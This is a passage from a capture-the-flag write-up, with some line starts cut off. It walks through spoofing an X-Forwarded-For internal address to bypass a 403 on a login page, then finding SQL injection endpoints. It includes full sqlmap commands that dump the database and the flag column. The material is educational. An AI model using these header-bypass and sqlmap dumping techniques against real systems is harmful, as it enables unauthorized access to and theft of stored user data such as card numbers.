login.php, but it gives us a 403 Forbidden error. Looking a little deeper into
gallery.phpshows us that some of the pictures of the devices include internal subnet addresses.
X-Forwarded-Forheader is used for identifying the originating IP address of a client connecting to a web server through an HTTP proxy or a load balancer.
X-Forwarded-For: 192.168.3.x, where
xis the payload, we see that by setting the
192.168.3.16, we gain access to the login page.
'in username parameter leads to the following output:
users.phppage. This page contains usernames and card numbers.
/users.php?id=1returns only the data for user ID 1. Fuzzing the input leads us to discover that this is a second SQL injection endpoint. This time, there is a blacklist filter:
sqlmap -r get.req --threads 10 --dbms mysql --dump --no-escape --tamper=betweendumps the database.
R34L_F14Gcolumn, but it is returning us
<blank>results. I looked deeper into the SQLMap queries, and found that the following query is used to retrieve the column values.
R34L_F14Gfails the blacklist filter, so SQLMap was unable to retrieve any results.
login.phpfrom earlier? It did not filter
R34L_F14G, but it does have an SQL injection vector too. It was a blind SQL injection, so retrieving information from the database would be time-based and it would have been too slow to dump the entire database.
sqlmap -u http://challenges.ctfd.io:30232/login.php --headers=“X-Forwarded-For: 192.168.3.16” --data “password=1&username=test” --dbms=mysql --tamper=between -D users_data -T data -C R34L_F14G --dump --where “id=3”